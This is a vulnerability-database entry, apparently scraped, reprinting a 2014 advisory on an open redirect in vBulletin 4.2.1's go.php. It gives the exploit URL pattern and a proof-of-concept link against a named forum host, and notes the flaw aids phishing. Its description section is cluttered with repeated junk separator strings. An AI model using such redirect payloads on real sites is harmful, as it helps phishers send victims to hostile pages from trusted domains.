vBulletin 4.2.1 Open Redirect

176   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1330
CVE编号:
漏洞类型: -
漏洞来源: cxs
发布日期: 2014-11-05
CVSS
CVSS值: -
严重级别: 低危
利用范围: -
攻击复杂度: -
认证级别: -
漏洞描述

WLB-2014110017[***]http://cxsecurity.com/issue/WLB-2014110017[***]Bug: vBulletin 4.2.1 Open Redirect ( Ascii Version )[***]vBulletin 4.2.1 Open Redirect[***]2014.11.05[***]Felipe Renzi Gabriel[***]Low[***]CWE-601@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]N/A ( Add )@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** </form>[***]No[***]Yes[***][***][***][***][***][***][***][***][***] # URL Open Redirect on vBulletin@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Risk: Low@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # CWE number: CWE-601@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Version: 4.2.1@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Date: 29/10/2014@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Author: Felipe " Renzi " Gabriel@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Contact: renzi@linuxmail.org@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Tested on Windows 8 pro@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Vulnerable File: go.php@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Exploit:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [+] http://host.com/go.php?url=http://site.com@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # PoC:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [+] http://vb.bdr1.net/go.php?url=http://www.google.com@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Wait 30 seconds, and you will be redirect...@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Note: Open redirect (CWE-601) allows phishing attack to be more effective.@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Redirection is commonly used within all web applications for various@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** purposes.("Jason Lam" ~ Top 25 Series - Rank 23 - Open Redirect)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Reference: http://software-security.sans.org@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** # Thank's@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]http://software-security.sans.org

POC

# URL Open Redirect on vBulletin # Risk: Low # CWE number: CWE-601 # Version: 4.2.1 # Date: 29/10/2014 # Author: Felipe " Renzi " Gabriel # Contact: renzi@linuxmail.org # Tested on Windows 8 pro # Vulnerable File: go.php # Exploit: [+] http://host.com/go.php?url=http://site.com # PoC: [+] http://vb.bdr1.net/go.php?url=http://www.google.com Wait 30 seconds, and you will be redirect... # Note: Open redirect (CWE-601) allows phishing attack to be more effective. Redirection is commonly used within all web applications for various purposes.("Jason Lam" ~ Top 25 Series - Rank 23 - Open Redirect) # Reference: http://software-security.sans.org # Thank's